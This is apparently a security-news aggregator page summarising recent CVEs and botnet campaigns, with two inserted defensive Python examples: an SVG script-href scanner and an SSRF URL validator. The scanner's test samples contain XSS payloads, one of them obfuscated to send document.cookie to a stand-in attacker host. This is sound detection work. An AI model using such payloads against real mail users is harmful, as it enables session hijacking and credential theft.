theinfosecnews
vulnerability

Kimwolf: Analysis of the Kimwolf Botnet Operator 'Dort' and Associated Threat Activity

The Kimwolf botnet exploited weaknesses in residential proxy services to infect devices on the networks behind those proxies, then used them for widespread DDoS and harassment attacks. The operator, known as Dort and identified as Jacob Butler of Canada, used multiple aliases and cybercrime tooling to carry out account takeovers and retaliatory attacks against researchers. Patching proxy software and enforcing strict network controls are critical to mitigating this threat.

Krebs on Security·35d ago·3 min read
vulnerability

CVE-2022-20775: Cisco SD-WAN CLI Path Traversal Enables Root-Level Privilege Escalation

CVE-2022-20775 is a path traversal vulnerability in Cisco SD-WAN's CLI that allows an authenticated local attacker to bypass access controls and execute arbitrary commands as root. The flaw affects Cisco SD-WAN deployments and carries a CISA KEV remediation deadline of February 27, 2026 for federal agencies. Administrators should apply Cisco's official patches immediately and restrict CLI access to trusted accounts as an interim control.

CISA KEV·38d ago·3 min read
malware

Starkiller Phishing-as-a-Service: Real-Time Session Hijacking and MFA Bypass

Starkiller is a phishing-as-a-service platform that proxies victims’ interactions with legitimate login pages to capture credentials and bypass MFA. Delivered by the Jinkusu threat group, it uses Docker-based headless Chrome instances to relay real-time sessions and harvest authentication tokens. This service circumvents traditional detection and lowers the technical bar for cybercriminals.

Krebs on Security·42d ago·2 min read
vulnerability

CVE-2025-68461: Roundcube Webmail SVG Animate Tag Enables Stored XSS Attack

CVE-2025-68461 is a cross-site scripting vulnerability in Roundcube Webmail caused by inadequate sanitization of the SVG `<animate>` tag. An attacker can deliver a malicious SVG via email to execute arbitrary JavaScript in a victim's authenticated session, enabling session hijacking, credential theft, and unauthorized account actions. CISA requires federal agencies to patch by March 13, 2026; all organizations should upgrade Roundcube immediately and consider blocking SVG rendering as an interim control.

CISA KEV·43d ago·3 min read
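The summary above describes the Roundcube flaw as inadequate sanitization of the SVG `<animate>` tag and suggests blocking SVG rendering as an interim control. The following is an added example, not Roundcube's code: a gateway-side check that flags SMIL animation elements (`<animate>`, `<set>` and friends) whose target attribute is `href` or `xlink:href` and whose animated value is a script-scheme URL, which is how an animation element turns an otherwise harmless link into a script launcher. The element and scheme lists, the entity/whitespace normalisation and the sample markup are this example's assumptions and constructed inputs; upgrading Roundcube remains the actual fix.

```python
"""Flag SVG markup that retargets href to a script URL through SMIL animation.

Added example for the Roundcube XSS item; not code from the Roundcube project.
Assumes the mechanism the summary describes: an animation element whose
attributeName is href and whose animated values carry a javascript: URL.
"""
import re
from html.parser import HTMLParser

# SMIL elements that can rewrite another element's attribute at render time.
SMIL_TAGS = {"animate", "set", "animatemotion", "animatetransform"}
HREF_TARGETS = {"href", "xlink:href"}
VALUE_ATTRS = ("to", "from", "by", "values")
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")


def normalise_url(value: str) -> str:
    """Strip ASCII control characters and whitespace, then lower-case.

    Browsers ignore these inside a scheme, so 'java\\nscript:' still runs;
    compare against the form the browser will actually see.
    """
    return re.sub(r"[\x00-\x20]", "", value).lower()


class SmilHrefScanner(HTMLParser):
    """Collect SMIL elements that animate href towards a script scheme."""

    def __init__(self) -> None:
        # HTMLParser lower-cases tag and attribute names and decodes character
        # references in attribute values, so &#106;ava... is seen as 'java...'.
        super().__init__(convert_charrefs=True)
        self.findings: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag not in SMIL_TAGS:
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("attributename", "").lower() not in HREF_TARGETS:
            return
        for name in VALUE_ATTRS:
            if name not in a:
                continue
            # values="a;b;c" is a keyframe list; every entry is a candidate URL.
            for part in a[name].split(";"):
                if normalise_url(part).startswith(SCRIPT_SCHEMES):
                    self.findings.append((tag, name, part.strip()))


def scan_for_smil_href_abuse(markup: str) -> list[tuple[str, str, str]]:
    """Return (element, attribute, value) for each script-scheme href animation."""
    scanner = SmilHrefScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


# Constructed samples for this example (not captured from real mail).
MALICIOUS_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<a><text x="10" y="20">open attachment</text>'
    '<animate attributeName="href" values="javascript:alert(document.cookie)" dur="1s" fill="freeze"/>'
    "</a></svg>"
)
# Entity-encoded first letter plus an embedded tab: naive substring checks miss it.
OBFUSCATED_SVG = (
    "<svg><a><text>invoice</text>"
    "<set attributeName=\"xlink:href\" to=\"&#106;ava\tscript:fetch('//attacker.invalid/'+document.cookie)\"/>"
    "</a></svg>"
)
BENIGN_SVG = '<svg><circle r="5"><animate attributeName="r" from="5" to="20" dur="2s"/></circle></svg>'

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SVG), ("obfuscated", OBFUSCATED_SVG), ("benign", BENIGN_SVG)):
        print(label, scan_for_smil_href_abuse(sample))
```

A mail gateway can run this over inline SVG and SVG attachments and quarantine or strip anything it flags; the benign animation of a numeric attribute passes, so the check is narrower than blocking all SVG. It is a heuristic for the window before the upgrade is deployed, not a sanitizer.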
vulnerability

CVE-2021-22175: GitLab Webhook SSRF Allows Internal Network Access via Malicious Requests

CVE-2021-22175 is an SSRF vulnerability in self-managed GitLab instances that allows authenticated attackers with webhook creation permissions to force the GitLab server to make requests to internal network resources, including databases, admin interfaces, and cloud metadata endpoints. The flaw bypasses network segmentation by using the GitLab server itself as a proxy. CISA has added it to the Known Exploited Vulnerabilities catalog with a federal patch deadline of March 11, 2026.

CISA KEV·45d ago·3 min read
vulnerability

CVE-2026-22769: Dell RecoverPoint for Virtual Machines Exposes Root Access via Hard-Coded Credentials

CVE-2026-22769 affects Dell RecoverPoint for Virtual Machines (RP4VMs) and allows unauthenticated remote attackers to gain root-level OS access using hard-coded credentials embedded in the product. Exploitation requires no user interaction and no valid credentials, giving attackers full control over backup and recovery infrastructure. CISA requires federal agencies to patch by February 21, 2026; all organizations should isolate affected appliances, apply Dell's patch immediately, and audit for existing persistence.

CISA KEV·45d ago·3 min read
vulnerability

CVE-2020-7796: Zimbra Collaboration Suite SSRF Flaw via WebEx Zimlet Exposes Internal Infrastructure

CVE-2020-7796 is an unauthenticated SSRF vulnerability in Synacor Zimbra Collaboration Suite, triggered when the WebEx zimlet is installed and zimlet JSP processing is enabled. Attackers can force the Zimbra server to issue arbitrary internal HTTP requests, enabling access to backend services and cloud metadata endpoints. CISA has added this to its Known Exploited Vulnerabilities catalog with a federal remediation deadline of March 10, 2026.

CISA KEV·46d ago·3 min read
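Both the GitLab webhook item and the Zimbra zimlet item above describe the same class of bug: the server is handed a URL and fetches it from inside the trust boundary, reaching databases, admin interfaces and cloud metadata endpoints. The following is an added example, not code from GitLab or Zimbra, of the generic server-side control for operator-supplied outbound URLs: allow only http/https, refuse embedded credentials and well-known metadata hostnames, resolve the host, and reject the target if any resolved address is loopback, private, link-local, shared address space or IPv4-mapped. The blocked ranges and hostnames, the injectable resolver and the fake DNS table are this example's assumptions and constructed data.

```python
"""Validate an operator-supplied outbound URL before the server fetches it.

Added example for the GitLab webhook and Zimbra zimlet SSRF items; not code
from either project. The resolver is injectable so the check runs offline;
the FAKE_DNS table below is constructed for the example.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges not already covered by the ipaddress is_* flags: "this network",
# shared address space (RFC 6598) and IPv4-mapped IPv6 (::ffff:a.b.c.d).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "100.64.0.0/10", "::ffff:0:0/96",
)]
# Well-known metadata names; 169.254.169.254 itself is link-local and caught below.
BLOCKED_HOSTNAMES = {"metadata.google.internal", "metadata", "instance-data"}


class SSRFTargetError(ValueError):
    """Raised when a URL must not be fetched from inside the trust boundary."""


def system_resolve(host: str) -> set[str]:
    """Resolve with the OS resolver (A and AAAA); default when nothing is injected."""
    return {ai[4][0] for ai in socket.getaddrinfo(host, None)}


def is_blocked_address(addr) -> bool:
    # is_private also covers the RFC 5737 documentation ranges, which is why
    # the sample table below does not use 192.0.2.x / 203.0.113.x.
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified
            or any(addr in net for net in BLOCKED_NETWORKS))


def validate_outbound_url(url: str, resolve=system_resolve,
                          allowed_schemes=("http", "https")) -> set:
    """Return the set of validated IP addresses for url, or raise SSRFTargetError."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in allowed_schemes:
        raise SSRFTargetError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        # 'http://hooks.example.com@10.0.0.1/' defeats naive substring allow-lists.
        raise SSRFTargetError("credentials in URL are not allowed")
    host = (parts.hostname or "").rstrip(".")   # lower-cased, brackets removed
    if not host:
        raise SSRFTargetError("missing host")
    if host in BLOCKED_HOSTNAMES:
        raise SSRFTargetError(f"blocked hostname: {host}")
    try:
        addrs = {ipaddress.ip_address(host)}        # literal IPv4/IPv6
    except ValueError:
        # Not a literal. This branch also catches '0177.0.0.1' and '2130706433',
        # which the OS resolver would turn into 127.0.0.1, so they get resolved
        # and judged by address rather than slipping past a string check.
        resolved = resolve(host)
        if not resolved:
            raise SSRFTargetError(f"unresolvable host: {host}")
        addrs = {ipaddress.ip_address(a) for a in resolved}
    blocked = sorted(str(a) for a in addrs if is_blocked_address(a))
    if blocked:
        # A single internal address among several is enough to reject.
        raise SSRFTargetError(f"{host} resolves to blocked address(es): {', '.join(blocked)}")
    return addrs


def is_safe_target(url: str, resolve=system_resolve) -> bool:
    """Boolean wrapper around validate_outbound_url."""
    try:
        validate_outbound_url(url, resolve=resolve)
        return True
    except SSRFTargetError:
        return False


# Constructed DNS table for the example; production code uses system_resolve.
FAKE_DNS = {
    "hooks.example.com": ["200.1.2.3"],
    "metadata-alias.example.net": ["169.254.169.254"],
    "dual.example.org": ["200.1.2.4", "10.0.0.5"],
}


def fake_resolve(host: str) -> list[str]:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ("https://hooks.example.com/notify", "http://169.254.169.254/latest/meta-data/",
              "http://dual.example.org/", "http://[::ffff:169.254.169.254]/"):
        print(u, "->", "allowed" if is_safe_target(u, resolve=fake_resolve) else "blocked")
```

The function returns the validated addresses on purpose: the fetch should connect to one of those addresses (sending the original hostname in the Host/SNI field) rather than resolving the name a second time, otherwise a DNS rebinding attacker can answer the validation lookup with a public address and the connection lookup with an internal one. Redirect responses need the same validation applied to each hop.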
vulnerability

CVE-2025-40536: SolarWinds Web Help Desk Authentication Bypass Exposes Restricted Functionality to Unauthenticated Attackers

CVE-2025-40536 is an authentication bypass vulnerability in SolarWinds Web Help Desk that allows unauthenticated remote attackers to access restricted application functionality without credentials. Successful exploitation can lead to data theft, privilege escalation, and lateral movement through connected enterprise systems. CISA has added the flaw to its Known Exploited Vulnerabilities catalog and requires federal agencies to patch by February 15, 2026.

CISA KEV·51d ago·3 min read
malware

Kimwolf IoT Botnet Disrupts I2P Network in Failed Sybil Attack

The Kimwolf IoT botnet recently attempted a Sybil attack on the I2P network by flooding it with hundreds of thousands of infected devices, causing severe disruptions. Kimwolf operators use I2P and similar anonymity networks as fallback command and control channels to evade takedown efforts. Detection involves monitoring network anomalies and known IoT malware signatures; removal requires firmware patching and network segmentation.

Krebs on Security·51d ago·2 min read
vulnerability

Microsoft Patches Six Zero-Day Vulnerabilities Impacting Windows and Developer Tools in February 2026 Update

Microsoft's February 2026 Patch Tuesday addresses over 50 vulnerabilities including six zero-day flaws actively exploited in the wild. Critical fixes affect Windows Shell, MSHTML, Microsoft Word, Remote Desktop Services, Desktop Window Manager, and developer tools such as GitHub Copilot and VS Code. Administrators should urgently apply these patches to prevent privilege escalation, code execution, and denial-of-service attacks.

Krebs on Security·52d ago·2 min read
vulnerability

CVE-2026-21525: Windows Remote Access Connection Manager NULL Pointer Dereference Enables Local DoS

CVE-2026-21525 is a NULL pointer dereference in the Windows Remote Access Connection Manager (RasMan) service that allows a local attacker to crash the service and disrupt VPN and dial-up connectivity. Exploitation needs only the ability to run code on the host, so the flaw matters wherever an attacker already has a foothold. CISA mandates federal agencies patch by 2026-03-03; organizations should apply Microsoft's security update immediately and restrict local logon as an interim control.

CISA KEV·53d ago·3 min read